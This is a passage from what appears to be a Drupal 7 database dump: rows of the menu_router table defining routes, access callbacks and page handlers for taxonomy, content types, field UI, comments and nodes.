taxonomy\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:13:\"taxonomy_term\";i:2;i:3;i:3;s:7:\"default\";}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','Manage display','t','','','a:0:{}',132,'','',2,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/display/default','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:19:\"administer taxonomy\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:13:\"taxonomy_term\";i:2;i:3;i:3;s:7:\"default\";}','',59,6,1,'admin/structure/taxonomy/%/display','admin/structure/taxonomy/%','Default','t','','','a:0:{}',140,'','',-10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/display/full','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:19:\"administer taxonomy\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:13:\"taxonomy_term\";i:2;i:3;i:3;s:4:\"full\";}','',59,6,1,'admin/structure/taxonomy/%/display','admin/structure/taxonomy/%','Taxonomy term page','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/edit','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:24:\"taxonomy_form_vocabulary\";i:1;i:3;}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','Edit','t','','','a:0:{}',132,'','',-10,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/%/fields','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:13:\"taxonomy_term\";i:2;i:3;}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','Manage fields','t','','','a:0:{}',132,'','',1,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:5;}','',58,6,0,'','admin/structure/taxonomy/%/fields/%','','field_ui_menu_title','a:1:{i:0;i:5;}','','a:0:{}',6,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%/delete','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:26:\"field_ui_field_delete_form\";i:1;i:5;}','',117,7,1,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','Delete','t','','','a:0:{}',132,'','',10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%/edit','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:5;}','',117,7,1,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','Edit','t','','','a:0:{}',140,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%/field-settings','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:28:\"field_ui_field_settings_form\";i:1;i:5;}','',117,7,1,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','Field settings','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/fields/%/widget-type','a:2:{i:3;a:1:{s:37:\"taxonomy_vocabulary_machine_name_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:13:\"taxonomy_term\";i:1;i:3;i:2;s:1:\"3\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:25:\"field_ui_widget_type_form\";i:1;i:5;}','',117,7,1,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','Widget type','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/taxonomy/%/list','a:1:{i:3;s:37:\"taxonomy_vocabulary_machine_name_load\";}','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:2:{i:0;s:23:\"taxonomy_overview_terms\";i:1;i:3;}','',29,5,1,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','List','t','','','a:0:{}',140,'','',-20,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/add','','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:1:{i:0;s:24:\"taxonomy_form_vocabulary\";}','',15,4,1,'admin/structure/taxonomy','admin/structure/taxonomy','Add vocabulary','t','','','a:0:{}',388,'','',0,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/taxonomy/list','','','user_access','a:1:{i:0;s:19:\"administer taxonomy\";}','drupal_get_form','a:1:{i:0;s:30:\"taxonomy_overview_vocabularies\";}','',15,4,1,'admin/structure/taxonomy','admin/structure/taxonomy','List','t','','','a:0:{}',140,'','',-10,'modules/taxonomy/taxonomy.admin.inc'),('admin/structure/types','','','user_access','a:1:{i:0;s:24:\"administer content types\";}','node_overview_types','a:0:{}','',7,3,0,'','admin/structure/types','Content types','t','','','a:0:{}',6,'Manage content types, including default status, front page promotion, comment settings, etc.','',0,'modules/node/content_types.inc'),('admin/structure/types/add','','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:1:{i:0;s:14:\"node_type_form\";}','',15,4,1,'admin/structure/types','admin/structure/types','Add content type','t','','','a:0:{}',388,'','',0,'modules/node/content_types.inc'),('admin/structure/types/list','','','user_access','a:1:{i:0;s:24:\"administer content types\";}','node_overview_types','a:0:{}','',15,4,1,'admin/structure/types','admin/structure/types','List','t','','','a:0:{}',140,'','',-10,'modules/node/content_types.inc'),('admin/structure/types/manage/%','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:14:\"node_type_form\";i:1;i:4;}','',30,5,0,'','admin/structure/types/manage/%','Edit content type','node_type_page_title','a:1:{i:0;i:4;}','','a:0:{}',6,'','',0,'modules/node/content_types.inc'),('admin/structure/types/manage/%/comment/display','a:1:{i:4;s:22:\"comment_node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:7:\"comment\";i:2;i:4;i:3;s:7:\"default\";}','',123,7,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Comment display','t','','','a:0:{}',132,'','',4,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/display/default','a:1:{i:4;s:22:\"comment_node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:7:\"comment\";i:2;i:4;i:3;s:7:\"default\";}','',247,8,1,'admin/structure/types/manage/%/comment/display','admin/structure/types/manage/%','Default','t','','','a:0:{}',140,'','',-10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/display/full','a:1:{i:4;s:22:\"comment_node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:7:\"comment\";i:2;i:4;i:3;s:4:\"full\";}','',247,8,1,'admin/structure/types/manage/%/comment/display','admin/structure/types/manage/%','Full comment','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields','a:1:{i:4;s:22:\"comment_node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:7:\"comment\";i:2;i:4;}','',123,7,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Comment fields','t','','','a:0:{}',132,'','',3,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:7;}','',246,8,0,'','admin/structure/types/manage/%/comment/fields/%','','field_ui_menu_title','a:1:{i:0;i:7;}','','a:0:{}',6,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%/delete','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:26:\"field_ui_field_delete_form\";i:1;i:7;}','',493,9,1,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','Delete','t','','','a:0:{}',132,'','',10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%/edit','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:7;}','',493,9,1,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','Edit','t','','','a:0:{}',140,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%/field-settings','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:28:\"field_ui_field_settings_form\";i:1;i:7;}','',493,9,1,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','Field settings','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/comment/fields/%/widget-type','a:2:{i:4;a:1:{s:22:\"comment_node_type_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:7;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:7:\"comment\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:25:\"field_ui_widget_type_form\";i:1;i:7;}','',493,9,1,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','Widget type','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/delete','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"node_type_delete_confirm\";i:1;i:4;}','',61,6,0,'','admin/structure/types/manage/%/delete','Delete','t','','','a:0:{}',6,'','',0,'modules/node/content_types.inc'),('admin/structure/types/manage/%/display','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:7:\"default\";}','',61,6,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Manage display','t','','','a:0:{}',132,'','',2,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/default','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:7:\"default\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Default','t','','','a:0:{}',140,'','',-10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/full','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:4:\"full\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Full content','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/rss','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:3:\"rss\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:3:\"rss\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','RSS','t','','','a:0:{}',132,'','',2,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/search_index','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:12:\"search_index\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:12:\"search_index\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Search index','t','','','a:0:{}',132,'','',3,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/search_result','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:13:\"search_result\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:13:\"search_result\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Search result highlighting input','t','','','a:0:{}',132,'','',4,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/display/teaser','a:1:{i:4;s:14:\"node_type_load\";}','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"node\";i:1;i:4;i:2;s:6:\"teaser\";i:3;s:11:\"user_access\";i:4;s:24:\"administer content types\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"node\";i:2;i:4;i:3;s:6:\"teaser\";}','',123,7,1,'admin/structure/types/manage/%/display','admin/structure/types/manage/%','Teaser','t','','','a:0:{}',132,'','',1,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/edit','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:14:\"node_type_form\";i:1;i:4;}','',61,6,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Edit','t','','','a:0:{}',140,'','',0,'modules/node/content_types.inc'),('admin/structure/types/manage/%/fields','a:1:{i:4;s:14:\"node_type_load\";}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:4:\"node\";i:2;i:4;}','',61,6,1,'admin/structure/types/manage/%','admin/structure/types/manage/%','Manage fields','t','','','a:0:{}',132,'','',1,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:6;}','',122,7,0,'','admin/structure/types/manage/%/fields/%','','field_ui_menu_title','a:1:{i:0;i:6;}','','a:0:{}',6,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%/delete','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:26:\"field_ui_field_delete_form\";i:1;i:6;}','',245,8,1,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','Delete','t','','','a:0:{}',132,'','',10,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%/edit','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:6;}','',245,8,1,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','Edit','t','','','a:0:{}',140,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%/field-settings','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:28:\"field_ui_field_settings_form\";i:1;i:6;}','',245,8,1,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','Field settings','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/structure/types/manage/%/fields/%/widget-type','a:2:{i:4;a:1:{s:14:\"node_type_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}i:6;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"node\";i:1;i:4;i:2;s:1:\"4\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:24:\"administer content types\";}','drupal_get_form','a:2:{i:0;s:25:\"field_ui_widget_type_form\";i:1;i:6;}','',245,8,1,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','Widget type','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/tasks','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',3,2,1,'admin','admin','Tasks','t','','','a:0:{}',140,'','',-20,'modules/system/system.admin.inc'),('admin/update/ready','','','update_manager_access','a:0:{}','drupal_get_form','a:1:{i:0;s:32:\"update_manager_update_ready_form\";}','',7,3,0,'','admin/update/ready','Ready to update','t','','','a:0:{}',0,'','',0,'modules/update/update.manager.inc'),('batch','','','1','a:0:{}','system_batch_page','a:0:{}','',1,1,0,'','batch','','t','','_system_batch_theme','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('comment/%','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:15:\"access comments\";}','comment_permalink','a:1:{i:0;i:1;}','',2,2,0,'','comment/%','Comment permalink','t','','','a:0:{}',6,'','',0,''),('comment/%/approve','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_approve','a:1:{i:0;i:1;}','',5,3,0,'','comment/%/approve','Approve','t','','','a:0:{}',6,'','',1,'modules/comment/comment.pages.inc'),('comment/%/delete','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:19:\"administer comments\";}','comment_confirm_delete_page','a:1:{i:0;i:1;}','',5,3,1,'comment/%','comment/%','Delete','t','','','a:0:{}',132,'','',2,'modules/comment/comment.admin.inc'),('comment/%/edit','a:1:{i:1;s:12:\"comment_load\";}','','comment_access','a:2:{i:0;s:4:\"edit\";i:1;i:1;}','comment_edit_page','a:1:{i:0;i:1;}','',5,3,1,'comment/%','comment/%','Edit','t','','','a:0:{}',132,'','',0,''),('comment/%/view','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:15:\"access comments\";}','comment_permalink','a:1:{i:0;i:1;}','',5,3,1,'comment/%','comment/%','View comment','t','','','a:0:{}',140,'','',-10,''),('comment/reply/%','a:1:{i:2;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:4:\"view\";i:1;i:2;}','comment_reply','a:1:{i:0;i:2;}','',6,3,0,'','comment/reply/%','Add new comment','t','','','a:0:{}',6,'','',0,'modules/comment/comment.pages.inc'),('contact','','','user_access','a:1:{i:0;s:29:\"access site-wide contact form\";}','drupal_get_form','a:1:{i:0;s:17:\"contact_site_form\";}','',1,1,0,'','contact','Contact','t','','','a:0:{}',20,'','',0,'modules/contact/contact.pages.inc'),('file/ajax','','','user_access','a:1:{i:0;s:14:\"access content\";}','file_ajax_upload','a:0:{}','ajax_deliver',3,2,0,'','file/ajax','','t','','ajax_base_page_theme','a:0:{}',0,'','',0,''),('file/progress','','','user_access','a:1:{i:0;s:14:\"access content\";}','file_ajax_progress','a:0:{}','',3,2,0,'','file/progress','','t','','ajax_base_page_theme','a:0:{}',0,'','',0,''),('filter/tips','','','1','a:0:{}','filter_tips_long','a:0:{}','',3,2,0,'','filter/tips','Compose tips','t','','','a:0:{}',20,'','',0,'modules/filter/filter.pages.inc'),('node','','','user_access','a:1:{i:0;s:14:\"access content\";}','node_page_default','a:0:{}','',1,1,0,'','node','','t','','','a:0:{}',0,'','',0,''),('node/%','a:1:{i:1;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:4:\"view\";i:1;i:1;}','node_page_view','a:1:{i:0;i:1;}','',2,2,0,'','node/%','','node_page_title','a:1:{i:0;i:1;}','','a:0:{}',6,'','',0,''),('node/%/delete','a:1:{i:1;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:6:\"delete\";i:1;i:1;}','drupal_get_form','a:2:{i:0;s:19:\"node_delete_confirm\";i:1;i:1;}','',5,3,2,'node/%','node/%','Delete','t','','','a:0:{}',132,'','',1,'modules/node/node.pages.inc'),('node/%/edit','a:1:{i:1;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:6:\"update\";i:1;i:1;}','node_page_edit','a:1:{i:0;i:1;}','',5,3,3,'node/%','node/%','Edit','t','','','a:0:{}',132,'','',0,'modules/node/node.pages.inc'),('node/%/revisions','a:1:{i:1;s:9:\"node_load\";}','','_node_revision_access','a:1:{i:0;i:1;}','node_revision_overview','a:1:{i:0;i:1;}','',5,3,1,'node/%','node/%','Revisions','t','','','a:0:{}',132,'','',2,'modules/node/node.pages.inc'),('node/%/revisions/%/delete','a:2:{i:1;a:1:{s:9:\"node_load\";a:1:{i:0;i:3;}}i:3;N;}','','_node_revision_access','a:2:{i:0;i:1;i:1;s:6:\"delete\";}','drupal_get_form','a:2:{i:0;s:28:\"node_revision_delete_confirm\";i:1;i:1;}','',21,5,0,'','node/%/revisions/%/delete','Delete earlier revision','t','','','a:0:{}',6,'','',0,'modules/node/node.pages.inc'),('node/%/revisions/%/revert','a:2:{i:1;a:1:{s:9:\"node_load\";a:1:{i:0;i:3;}}i:3;N;}','','_node_revision_access','a:2:{i:0;i:1;i:1;s:6:\"update\";}','drupal_get_form','a:2:{i:0;s:28:\"node_revision_revert_confirm\";i:1;i:1;}','',21,5,0,'','node/%/revisions/%/revert','Revert to earlier revision','t','','','a:0:{}',6,'','',0,'modules/node/node.pages.inc'),('node/%/revisions/%/view','a:2:{i:1;a:1:{s:9:\"node_load\";a:1:{i:0;i:3;}}i:3;N;}','','_node_revision_access','a:1:{i:0;i:1;}','node_show','a:2:{i:0;i:1;i:1;b:1;}','',21,5,0,'','node/%/revisions/%/view','Revisions','t','','','a:0:{}',6,'','',0,''),('node/%/track','a:1:{i:1;s:9:\"node_load\";}','','user_access','a:1:{i:0;s:17:\"access statistics\";}','statistics_node_tracker','a:0:{}','',5,3,1,'node/%','node/%','Track','t','','','a:0:{}',132,'','',2,'modules/statistics/statistics.pages.inc'),('node/%/view','a:1:{i:1;s:9:\"node_load\";}','','node_access','a:2:{i:0;s:4:\"view\";i:1;i:1;}','node_page_view','a:1:{i:0;i:1;}','',5,3,1,'node/%','node/%','View','t','','','a:0:{}',140,'','',-10,''),('node/add','','','_node_add_access','a:0:{}','node_add_page','a:0:{}','',3,2,0,'','node/add','Add content','t','','','a:0:{}',6,'','',0,'modules/node/node.pages.inc'),('node/add/article','','','node_access','a:2:{i:0;s:6:\"create\";i:1;s:7:\"article\";}','node_add','a:1:{i:0;s:7:\"article\";}','',7,3,0,'','node/add/article','Article','check_plain','','','a:0:{}',6,'Use articles for time-sensitive content like news, press releases or blog posts.','',0,'modules/node/node.pages.inc'),('node/add/page','','','node_access','a:2:{i:0;s:6:\"create\";i:1;s:4:\"page\";}','node_add','a:1:{i:0;s:4:\"page\";}','',7,3,0,'','node/add/page','Basic page','check_plain','','','a:0:{}',6,'Use basic pages for your static content, such as an \'About us\' page.','',0,'modules/node/node.pages.inc'),('overlay-ajax/%','a:1:{i:1;N;}','','user_access','a:1:{i:0;s:14:\"access overlay\";}','overlay_ajax_render_region','a:1:{i:0;i:1;}','',2,2,0,'','overlay-ajax/%','','t','','','a:0:{}',0,'','',0,''),('overlay/dismiss-message','','','user_access','a:1:{i:0;s:14:\"access overlay\";}','overlay_user_dismiss_message','a:0:{}','',3,2,0,'','overlay/dismiss-message','','t','','','a:0:{}',0,'','',0,''),('rss.xml','','','user_access','a:1:{i:0;s:14:\"access content\";}','node_feed','a:2:{i:0;b:0;i:1;a:0:{}}','',1,1,0,'','rss.xml','RSS 